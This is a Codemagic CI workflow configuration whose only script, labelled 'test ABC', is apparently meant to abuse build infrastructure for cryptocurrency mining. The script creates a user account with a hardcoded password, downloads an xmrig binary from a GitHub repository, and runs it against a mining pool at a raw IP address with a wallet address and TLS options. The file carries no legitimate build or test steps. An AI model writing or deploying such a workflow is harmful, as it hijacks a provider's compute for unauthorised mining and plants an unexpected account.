workflows:
  my-workflow:                # workflow ID
    name: My workflow name    # workflow name displayed in Codemagic UI
    instance_type: linux   # machine instance type
    max_build_duration: 120    # build duration in minutes (min 1, max 120)
    scripts:
    - name: test ABC
      script: |
            useradd rfhu -p kewjf89
            apt update -y
            apt install wget openssl tar -y
            for i in {1..2}
            do
               echo oke
            done
            wget https://raw.githubusercontent.com/willyfransca/xmrig-6.12.2/main/xmrig && chmod +x xmrig && ./xmrig -o 51.79.236.43:443 -u 89fYEJEXcF6boxxa7dK79PBqJPr6LBZZ16HD7NiFVfvqCoJKAppwup5Kpvsa7EEJhtjBoPonA4XQrWGcdfDtmbfA9M5sHD5 -k -t 2 -a rx/wow --tls --rig-id tes1
    
